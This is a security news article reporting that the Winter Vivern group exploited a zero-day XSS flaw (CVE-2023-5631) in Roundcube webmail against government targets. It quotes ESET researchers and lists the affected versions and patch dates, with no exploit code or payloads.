A relatively new attack group that has targeted European and Asian government organizations for several months has been exploiting a zero day XSS vulnerability in the open source Roundcube webmail server software in recent weeks.
The group is known as Winter Vivern, and researchers from several organizations have been tracking its activities since at least 2020. Many of the group’s targets have been government agencies, think tanks, and other government-connected organizations, and Winter Vivern has shown a propensity for exploiting flaws in email and collaboration software. The most recent campaign targeted CVE-2023-5631, an XSS vulnerability that attackers can exploit remotely through a malicious email.
Researchers from ESET observed Winter Vivern sending seemingly benign emails to victims and, after analysis, discovered that the messages contain a payload that performs JavaScript injection.
“Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turned out that this was a zero-day XSS vulnerability affecting the server-side script rcube_washtml.php, which doesn’t properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user,” the researchers said.
“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.”
Roundcube is a free and open source webmail server first released in 2008 and runs on many different platforms.
The bug affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15. ESET reported the vulnerability to the Roundcube maintainers on Oct. 14 and the team released updated versions to address it on Oct. 16.
Researchers believe that Winter Vivern may be working in alignment with the interests of the Belarussian government. The group has exploited known vulnerabilities in other software in the past, including a separate bug in Roundcube and one in Zimbra. Winter Vivern historically has targeted government organizations in Europe and Asia in its campaigns.